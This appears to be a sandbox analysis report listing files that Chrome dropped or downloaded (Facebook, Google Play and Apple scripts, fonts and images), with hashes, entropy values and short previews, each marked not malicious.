                                                                                                                                                                                                                                  MD5:F919798AF73D9EDB7029150EFFED7938
                                                                                                                                                                                                                                  SHA1:4DB71EA1E3ADB27E6BF6F42CA22D51D16412D789
                                                                                                                                                                                                                                  SHA-256:116F1CAABFAB3BC63EA2134EC0377CC250CCE9F9B396E24EF2914ACDCE9B99E2
                                                                                                                                                                                                                                  SHA-512:9BD995DBC8C48F86DA95EFF7A8260EB0457F8C38ED8056C9CD9DDD4DAC8383951CDEC2095FCAA0484D470BD4DB2000589C17414413DFF30E4A801633A0169485
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iH-D4/yD/l/en_GB/kIGqHY8H8ti.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdAppConstraintsConstants",[],(function(a,b,c,d,e,f){"use strict";a=[707152572647324..toString()];b="/apps";f.AD_APP_CONSTRAINT_VIEWER_ROLES=a;f.BASE_PATH=b}),66);.__d("AdsAPIObjectives",[],(function(a,b,c,d,e,f){e.exports={APP_INSTALLS:"APP_INSTALLS",BRAND_AWARENESS:"BRAND_AWARENESS",CANVAS_APP_ENGAGEMENT:"CANVAS_APP_ENGAGEMENT",CANVAS_APP_INSTALLS:"CANVAS_APP_INSTALLS",CONVERSIONS:"CONVERSIONS",DEPRECATED_CLICKS:"DEPRECATED_CLICKS",EVENT_RESPONSES:"EVENT_RESPONSES",EXTERNAL:"EXTERNAL",GROUP_JOINS:"GROUP_JOINS",IMPRESSIONS:"IMPRESSIONS",INCOMPATIBLE_CANVAS_APP_ENGAGEMENT:"INCOMPATIBLE_CANVAS_APP_ENGAGEMENT",INCOMPATIBLE_CANVAS_APP_INSTALLS:"INCOMPATIBLE_CANVAS_APP_INSTALLS",INCOMPATIBLE_EVENT_RESPONSES:"INCOMPATIBLE_EVENT_RESPONSES",INCOMPATIBLE_MOBILE_APP_INSTALLS:"INCOMPATIBLE_MOBILE_APP_INSTALLS",INCOMPATIBLE_OFFER_CLAIMS:"INCOMPATIBLE_OFFER_CLAIMS",INCOMPATIBLE_PAGE_ENGAGEMENT:"INCOMPATIBLE_PAGE_ENGAGEMENT",INCOMPATIBLE_PAGE_LIKES:"INCOMPATIBLE_PAGE_LIKES",
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.131126143884253
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnoLBSoXYAuGNG/QVI15hi3Gwl6h66MwQRaNw6JpyxZRNlad0:kRZTFwwyI/AI1Ti3vw7kbRN20
                                                                                                                                                                                                                                  MD5:4D6AA65BEF4E928AA6A1B69B964CAB75
                                                                                                                                                                                                                                  SHA1:A7C06609FA53BF1FA448B6AB69FC94D9B38E5A39
                                                                                                                                                                                                                                  SHA-256:2EED7F8D636B59BEC7084BBA9A1CC702810F075542630C5DBFE8229642200B5E
                                                                                                                                                                                                                                  SHA-512:1CF637525BE73F4C0DEAC854D794F294B587F9A7065AAD8E044E70CABC8FADD761805603E376361CFDE6B4FECA6ACEEB17338F05958ED87618A7E84C00140252
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("mmmrlc");._.qr(_.FAa,class extends _.rr{constructor(a){super(a.ta)}H(){return"mmmrlc"}N(){return!0}Xa(){return _.cAc}});_.$q.mmmrlc=_.Ez;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3792)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9345
                                                                                                                                                                                                                                  Entropy (8bit):5.263985222733283
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:5ncU1ciSTM/JvZLGCfKXuY3tZ8e1hwzTrubXQggbhDU/qFGK31yH0IYuApR2:mUnSTwOoKeiZn1hcwYDPFGK3g0HS
                                                                                                                                                                                                                                  MD5:789920D64701571A8C9CC2C0A333661D
                                                                                                                                                                                                                                  SHA1:5798B3B67D8B929875F4A006518ADBECFC331206
                                                                                                                                                                                                                                  SHA-256:60382F476A01A84BE86A0B2CC5743185FC9E1F4FB378C13EDA734132EFCDB295
                                                                                                                                                                                                                                  SHA-512:77C981AF5E2FDC8DC0FB51CD45F2C9ECB6C90D453A66B43C3C905785AE52E832BC0B21A891283D085407F822295DED0DA5A1B5E2852FB6CA8243409A48BE35EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsToggleSource",["keyMirror"],(function(a,b,c,d,e,f,g){"use strict";a=c("keyMirror")({action_bar_button:null,action_column_cell:null,automated_brand_lift_opt_in:null,cm_tip:null,copy:null,create:null,drawer_button:null,draft_indicator_table_cell:null,dropdown_button:null,edit_button:null,editor_footer:null,editor_publish:null,external_quick_create:null,full_funnel_strategy_dialog:null,ig_login_ig_boosted_post_unsupported_error_banner:null,inline_publish_cta:null,insights_button:null,investigate_cta:null,keyboard_escape:null,keyboard_shortcut:null,lightweight_attribution_campaign_name:null,midflight_recs_resolution_card:null,onenav_tab:null,perf_summary_tip:null,reach_frequency_dialog:null,secondary_view_close_button:null,secondary_view_switcher:null,signal_loss_limits_card:null,split_test_convergence_tip:null,split_test_dialog:null,split_test_opted_in_campaign_group_published:null,split_test_draft_publish_prompt:null,split_test_beaker_icon_tooltip:null,start_yo
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11608)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):49300
                                                                                                                                                                                                                                  Entropy (8bit):5.479518690240178
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:nVKzWIP4JeRBx5AJsNfWVO35t8w7xMYdbXV/qrqp3YWuScV178GfjCN+:Vg4hJsNfWV+h67BLCc
                                                                                                                                                                                                                                  MD5:F2BC7A733B7E080B2ABD68E746BD35A9
                                                                                                                                                                                                                                  SHA1:9AC345509086964E48D5410DD487B17B7395E077
                                                                                                                                                                                                                                  SHA-256:2948C27949C446E608F107D7DEAE7B84DF1A5D62929D0363788996171FFB827A
                                                                                                                                                                                                                                  SHA-512:52EB4A281E85D0D54CC6EBB06454C2514ACA79AACC53EF94046D7F85B5E62B58963845CE0BB2D2984F1F58B5DA81CD05C6CCB9B514C2777E5371D1C734BC1EC0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,b,c){return this._getArbiterInstance().inform(a,b,c)},subscribe:function(a,b,c){return this._getArbiterInstance().subscribe(a,b,c)},subscribeOnce:function(a,b,c){return this._getArbiterInstance().subscribeOnce(a,b,c)},unsubscribe:function(a){this._getArbiterInstance().unsubscribe(a)},unsubscribeCurrentSubscription:function(){this._getArbiterInstance().unsubscribeCurrentSubscription()},releaseCurrentPersistentEvent:function(){this._getArbiterInstance().releaseCurrentPersistentEvent()},registerCallback:function(a,b){return this._getArbiterInstance().registerCallback(a,b)},query:function(a){return this._getArbiterInstance().query(a)}};b=a;g["default"]=b}),98);.__d("FbtResultBase",[],(function(a,b,c,d,e,f){"use strict";var g=function(){fu
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2208x1242, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):461114
                                                                                                                                                                                                                                  Entropy (8bit):7.999495016816934
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:7N2Wq551jsArW5rQNGXnVyeWVlV/MLz3hSbmV1CB+mqHuLZ4gv8RvtmNpCCPChm2:BRASK8EeWxYEbA/HuLhv6tspCSPyGZlk
                                                                                                                                                                                                                                  MD5:6649C5F32AF7F500A61559054CEA6BE2
                                                                                                                                                                                                                                  SHA1:2F7FC77CF2EF09195C1981DB9D85070812F3F390
                                                                                                                                                                                                                                  SHA-256:8BDAAAF82784167044186C3666D7A4CA8E86D878538AD26337BBB17D7862D4D8
                                                                                                                                                                                                                                  SHA-512:51528E2CC22E68B4CF572FC2BADDA07C8BA0CE8F32C2A92C5DD97FE1C17D7C8867F842D2805D5E683B10BEE018767340DAE1B5657D3329AC0331A04BF964F343
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/y1SAU1g399-DZL0-G3-i0CoT2pQQABM5miEa1C3w2--MxFNh26USlCRt1WGTsmvA6H2v=w2560-h1440-rw
                                                                                                                                                                                                                                  Preview:RIFF2...WEBPVP8 &...0....*....>U$.E#.%%(..0...M..............|..?....HzS.!.!.?..hs..MF..T.{.[..._.y.......x.vW......!.....e.O.w...^.......=......p.....c......q.......~....?..g........2...g........?......w..._......!........[.y.....o...?.......................G...g......,.......S................s...w.....?.~........W.....................?.....|..S.w...'..O..?..]....................@?..h...../..~.>s.7...>6...?......7./....G..............g..........7.....?.~.z..C./...n~F.9.....G.O.O._........w.w%......a........_.?}......./...?.|..V......6....................~..F.C..._.....?....!........./}......c....i...M.%.B.N...p:'F@;..z..(.=...F..E.EJ..V.,/M.......>^$c-~.[1YK..j)...WpEh.aCV.....W1.}V.8_.*..$.".;....w.......[......XSn...p...Z:W&pd.M....[...r.F.......B....B...`KE.(.oP......Zj.q.Xm.........N...H..X........PW....)S.....;.......`......wb....BZ.Q.KV.;..j.Gv!-X(..%...%+Q.}...}o....o...[j)4.@;..T3.A.mB^.......6w<..u.{0...O....(E.D....5w{...,9...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (333)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):877
                                                                                                                                                                                                                                  Entropy (8bit):5.087140060597258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:UXv7Fc4DpWNRKL+BK/sgl9hrIYerznR3zueIDRTLG9fkVlF38LG0DAvue1nfQOO1:u6oTTlrIYevhTuKtLG0MJQOFsCK
                                                                                                                                                                                                                                  MD5:87D2E99C717F6A11EF59AB4D56189D37
                                                                                                                                                                                                                                  SHA1:07395D5E315170A7ACFDD3C84D343182ABE98488
                                                                                                                                                                                                                                  SHA-256:7CF7F25A6FEB976FC62596722380603118B8C7572E0867D0254D071BC2B93CD8
                                                                                                                                                                                                                                  SHA-512:19233492091920B98A067943C453D1538D7844EC4DB3B489B5B72E5D41B9E9E58A1D1984679653133ED60CF7002E014530DED9B55BA62853CD8867E5936EF0AC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as n}from"./p-2649b6ee.js";var r=n((function(n,r){Object.defineProperty(r,"__esModule",{value:!0}),r.getLanguages=void 0,r.getLanguages=function(){if("undefined"==typeof navigator)return[];if(navigator.languages)return navigator.languages;const n=navigator.language||navigator.userLanguage;return n?[n]:[]}}));export{r as n}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):6016
                                                                                                                                                                                                                                  Entropy (8bit):7.931230609029136
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:VKPMNbu1/GzZgw2MUe5N4iL+IdSHgwg/CPD5TreJ7xlVmhx1a2sKdNJVwJ49fDfx:APMQ1/k3h5F+1uCP1c73Ve7aEnwa5DWw
                                                                                                                                                                                                                                  MD5:2EDBD2236163FCACA2E6ADD4655EB2D8
                                                                                                                                                                                                                                  SHA1:785170958CE759A39179424E02914DCF04511957
                                                                                                                                                                                                                                  SHA-256:6253D1FE8F45FC5B01DCCA1DB4854CD8BB819389A848978791AC1D3FF98102EE
                                                                                                                                                                                                                                  SHA-512:3E5DE01D3B3E0E6F44FD006085CBA1863291CE52D1C9C07088EA1B15CAF273B47C96E11F7101428F87F2AA1116AF73D31F9E87F1F6E05CB3E24839AC37703E54
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.facebook.com/images/pages/create/biz_illustration.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............X......sRGB........:IDATx..].UU..wDD.DD..ADoA..D/EO.....C/}.C.IA..EPY.AE...d..=....6j..**~.u.8*......(......(t.q.z....?.^...r.....k........t....*.7JdV..l.d.....H.K..xd&<..z.MzJ7$CW......O....?..s.o..V.....'...6.A.4..]j....2I.w...h...lR\...?S....^...=.....' (IC.J......j....g..2..H...s..) (Nu.3.Jd~...SLr...qg..-Pz.f.h..i.2)}....XEER.k....=.....M. ...)...f.._.T4...h...A..$I.z..s...3....Y...[..6.sws.......p=x.y.........||....A.6...}...*.......T.."&x..W....W...C>U.x..Q.\...Pm........{L*}P.f..h..u(y.8K.,...."zB.....-.v$..!@3Bh".B.P.../..8..YM<..|......8y..5...y.:...JF.R}.."./gP4 ..#..x..S.>d..Ks......W~..qNN..`.AS..{..n\.m.)...&...S@./.=2..JUd...|-......@.@Q..g)......T.!C}...4.d....i.24...U>.....y....".+G....k...h9..G.x.J.......Of.pU]..]^......I...5dm2g..(Bf....k....-.c.H.....d..&.d.GH...g.~.*..Ri.. .._..".#]q}p.v..)>L..A..R.<I...>..#....=.......3I.k.....0.H..W.....3....*..U?..sA.MWy..-9?X .2...._....n.A.....S8....ZJ&...J.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12046)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):315768
                                                                                                                                                                                                                                  Entropy (8bit):5.548912737603686
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:IT0dmGFpmFu6lq0kd7+hJsEsEemve4s+2L:286Q/h4JsOQ
                                                                                                                                                                                                                                  MD5:5BF1F3EA44387CC345EF02F31F604F4D
                                                                                                                                                                                                                                  SHA1:63B32D8AF2E2D80E4B9ECB1DFC71427D3E50BCBB
                                                                                                                                                                                                                                  SHA-256:C6097EEED966EEC00651554AA9CA6D5FFBACAA37AD5E57EA657C2D66F089B42F
                                                                                                                                                                                                                                  SHA-512:8A8C900195F358947B516EDFC8F827CC66314F9B09B89E8E97448EBD90B94959AB5717AA5EF1E06A1221EF6AFEEA4C50F9E791352DA64020E7B963A38228E0DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"18",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__j","vtp_name":"navigator.userAgent"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",3],"vtp_name":"originalLocation"},{"function":"__u","convert_case_to":1,"vtp_component":"QUERY","vtp_queryKey":"utm_source","vtp_customUrlSource":["macro",4],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":["template",["macro",2],":",["macro",5]]},{"function":"__dbg"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"G-LL
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), CFF, length 233240, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):233240
                                                                                                                                                                                                                                  Entropy (8bit):7.998929579369334
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:RFtUp8TP0YyjsuhShhu0bAlZYs/UAkHgX4gf1G:RXUBNshhu0bA7YscgX4gfU
                                                                                                                                                                                                                                  MD5:86A24C421A052D323E49A952D88805B5
                                                                                                                                                                                                                                  SHA1:814A9DAF46A34AD6BC4F5BC0DE4940B166A85870
                                                                                                                                                                                                                                  SHA-256:A359121948E08165E21894786EE4E4E3C3F1AA55BB44DBAAD470D4ADF1B7DB9B
                                                                                                                                                                                                                                  SHA-512:0993B3670D42D9032831122D0E43D1843DA2361D8781B0CD75AA080A57F9DA273AC8A54414F8598EE12B2878787245B564A07F7E401C0282A47B5A0F57A825B3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlematerialicons/v142/Gw6kwdfw6UnXLJCcmafZyFRXb3BL9rvi0QZG3Q.woff2
                                                                                                                                                                                                                                  Preview:wOF2OTTO..............................................X.`..`.6.$..d....~. [......<.....* .d..K..A...&@..\....n..!.N...(.G.../.v.y.....................n..n...l*%.H.U..r.xp..Q....z.A..G.Q*...4R.@NZ7...5..^.RE.MjY.l.....v.{#.T.J.*..J....*....2.h"&.l.+Se.UI..J*(A......9j.4.j.hjaq.|i.1`.p,..S.W..,..:F.k..w.H.t............ ...(........t{5...r.5#"....].>*..Z.}...l5"".XDH.*5T..M....;9sw.c.!....Q.}.........8d1....QH.*.....I .%72..s.......fQ.V;.SH...V.W...q..2-...Y#+.6..m..D@..?.g!5TSZ...R....D 7=...v.K6..p.." ...v..j....F4...?.....<.s..Z...._rw.......4.B..... u&4.'4l........@~..E@X..,y..].$..]f-..$i.o...\9..2.`.6.#...W.j...7".o..V....%3..........!..?U.J.V...V..Mvz.....>...A........Z.D..3..s...!W].TUR.nUed.B.[.IK7.`.5...*..DJ.<.ME.\X.h.wJ..\0s....z+.EAF..4..hr....;...zE......9..d.Z.I["2...2c.'..:.v..3%C..2.S.9.s..h.m..Qk..J.....'c...Y.G.........&m..........v.R..].z~..4.ZC.s.......0]`[......./..O.)Ri..f.H...d.I....<#|...C.../.Y.~e.vN.u....Sl.|
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 99196, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):99196
                                                                                                                                                                                                                                  Entropy (8bit):7.997868398992993
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:1536:SQIJfyDgC8VN2bW1ToDcINoJjl3ox2/OSTGaaLDg39z0mRGRBLfG:lgpEW1T+Hel402bxk3ymQP+
                                                                                                                                                                                                                                  MD5:474D73A771E0CC31B43849CD2BAD9CC4
                                                                                                                                                                                                                                  SHA1:1D973B9CD90543FA43E6E74F164149278B9331FD
                                                                                                                                                                                                                                  SHA-256:AE98C3B1ED18478144791BFA0C71056B422287CD41F9B7D35C99063B04BE58EB
                                                                                                                                                                                                                                  SHA-512:257279598503AA3203ADA4A1A29CFA550F0485D3F7231E815A3734405D6BA18472D3E3F248CABDF39A774BF9B752D83218244F578D2FECA2C33711AA53888C01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.apple.com/wss/fonts/SF-Pro-Text/v2/sf-pro-text_regular.woff2
                                                                                                                                                                                                                                  Preview:wOF2.......|....../0...............................&..H.`*H...>...,..c.6.$..$..(.. ?meta....@. 8.t[;5..*Cng....5.P........-..3.j......1.c..6@..;.......FI}..#.........a.....{0.w.. .fd.i.K.+..p.cL.b]YJ.%..+...c.HF4.ett....=...N......."F......../p,1Z...V$...)^.M..-M%..y/|.^I......;..>..%...Jl....4.L%....<.l.,.:..u.Wy......:W.F.....}j,. V......-.U.F...8Q..Z}^t{x7..*....j.]-..V.]..7.).....Zqt..kD...~.......dG.U..b.V1S..8......Q...D7.]....n.9b'*....="........&...OtG..R......S._.D$.1d..&...9..=.l..yQ.._J.5.{.T.6TX...\..NX.....#.tqR8L.iDuRkW..2hUa)..7.+........Y...!.........z.J.5U6..C......R..;CN....=..\...j......o...[..P.....{@.L........Y....B..?.*.;.f..Y...j.]...`..$.iW0=.9Yue.xH7....5F.o6.._[......K.,...-..J[.f!*w...VaT.r..\..^TXq....S..G..6...n]l..TA0..0A,D1....R.|...S?..v...!1Z.lR.......5.LF.....H=..X......`$....`0....F]..m..1...i.S.x..Vc.v?..DQ_&..(.(.......3.........K....`.....E.......n.?..5L...5P.c.( .*..EAQ.....c.F.+.l.s.3..J.k:....+...}v..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11608)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):49300
                                                                                                                                                                                                                                  Entropy (8bit):5.479518690240178
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:nVKzWIP4JeRBx5AJsNfWVO35t8w7xMYdbXV/qrqp3YWuScV178GfjCN+:Vg4hJsNfWV+h67BLCc
                                                                                                                                                                                                                                  MD5:F2BC7A733B7E080B2ABD68E746BD35A9
                                                                                                                                                                                                                                  SHA1:9AC345509086964E48D5410DD487B17B7395E077
                                                                                                                                                                                                                                  SHA-256:2948C27949C446E608F107D7DEAE7B84DF1A5D62929D0363788996171FFB827A
                                                                                                                                                                                                                                  SHA-512:52EB4A281E85D0D54CC6EBB06454C2514ACA79AACC53EF94046D7F85B5E62B58963845CE0BB2D2984F1F58B5DA81CD05C6CCB9B514C2777E5371D1C734BC1EC0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y6/r/a2il9m3oo2U.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,b,c){return this._getArbiterInstance().inform(a,b,c)},subscribe:function(a,b,c){return this._getArbiterInstance().subscribe(a,b,c)},subscribeOnce:function(a,b,c){return this._getArbiterInstance().subscribeOnce(a,b,c)},unsubscribe:function(a){this._getArbiterInstance().unsubscribe(a)},unsubscribeCurrentSubscription:function(){this._getArbiterInstance().unsubscribeCurrentSubscription()},releaseCurrentPersistentEvent:function(){this._getArbiterInstance().releaseCurrentPersistentEvent()},registerCallback:function(a,b){return this._getArbiterInstance().registerCallback(a,b)},query:function(a){return this._getArbiterInstance().query(a)}};b=a;g["default"]=b}),98);.__d("FbtResultBase",[],(function(a,b,c,d,e,f){"use strict";var g=function(){fu
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.237674105306844
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnC/SoD0EQAuGNG/QVIF5hi8YSegZe+wQRaNw6JpyxZRNlad0:kRZTFC/SM9vI/AIpiJyZR8kbRN20
                                                                                                                                                                                                                                  MD5:6268C5E29B6BCA2A8AEDEE7BBF5EF0A2
                                                                                                                                                                                                                                  SHA1:B1671362AB66B7F96DD9B64586F4BF760B4FFD29
                                                                                                                                                                                                                                  SHA-256:1EFE5F3A38CB06216290946353D0C7517F9F6851FEBBD9ED8C3F8B6772E729A0
                                                                                                                                                                                                                                  SHA-512:FD4633EA7B084B61292FA9207711A6A38B91AD9E411D0659F02BEEE6EE28A1674CBC720130E3891807DA5E1815CDC68E75F90EC7D0D899C07E295BBBED793430
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("GjTCAc");._.qr(_.MBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"GjTCAc"}N(){return!0}Xa(){return _.n6}});_.$q.GjTCAc=_.hA;.._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (878)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1441
                                                                                                                                                                                                                                  Entropy (8bit):4.923625217494772
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:ildT+lZadfID4P9Gpl3fBzR1SQLA2RAMRMT6XFKg/7/GpSw8G9bFw4YZn:ild2ZbI9GpvRQQ82OUugFKg/7/Gpj8Gw
                                                                                                                                                                                                                                  MD5:188415311B33E9DFC79C3CC6147ED47D
                                                                                                                                                                                                                                  SHA1:486B072C15EA89B3D39F607F92327F1A338254B0
                                                                                                                                                                                                                                  SHA-256:8B3DA2AC016CE7C6F38F10052C50C7958935276BD5885009716FEC7B3D8ED681
                                                                                                                                                                                                                                  SHA-512:DD95C297899B58507824F3A3129E060BBA8A9F7D2045526DC66DAB584D19571069D84EB2591B7FBE71A0FBA96DD1BE1A32995184D37FCA9A1F699FC71739644B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.356.4d5c8581cf04321d0a9b.js
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[356],{84356:function(t){var o="touch".function s(t,o){this._target=t||document.body,this._attr=o||"data-focus-method",this._focusMethod=this._lastFocusMethod=!1,this._onKeyDown=this._onKeyDown.bind(this),this._onMouseDown=this._onMouseDown.bind(this),this._onTouchStart=this._onTouchStart.bind(this),this._onFocus=this._onFocus.bind(this),this._onBlur=this._onBlur.bind(this),this._onWindowBlur=this._onWindowBlur.bind(this),this._bindEvents()}var n=s.prototype.n._bindEvents=function(){this._target.addEventListener("keydown",this._onKeyDown,!0),this._target.addEventListener("mousedown",this._onMouseDown,!0),this._target.addEventListener("touchstart",this._onTouchStart,!0),this._target.addEventListener("focus",this._onFocus,!0),this._target.addEventListener("blur",this._onBlur,!0),window.addEventListener("blur",this._onWindowBlur)},n._onKeyDown=function(t){this._focusMethod="key"},n._onMouseD
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3089)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):69640
                                                                                                                                                                                                                                  Entropy (8bit):5.428026405432715
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8Rx5xxd9L0ngo2qQmDVeClRhw7d5i8q7nXxaFuYPdZIJVNfOT/BhqxlWZ:8j1dF6goxVe8vwiUFrdC2T/TwkZ
                                                                                                                                                                                                                                  MD5:F713EEB3B0A890A92D79B1B20AB97B0B
                                                                                                                                                                                                                                  SHA1:0262AD1062E4FC48562B58619FF2259F337D118F
                                                                                                                                                                                                                                  SHA-256:34747B2688FD1736007211CCCA2276A7C23F05228D1C4B5C2D4D239DDDBDFD14
                                                                                                                                                                                                                                  SHA-512:2B99EA22E50A6AF7988C5670411795A093A8CA25352BD881CC44FF141985C521FDFEA104F64F57B9A5C5572404516780D31CFC0D411B61DB1566020AA924068F
                                                                                                                                                                                                                                  Malicious:false
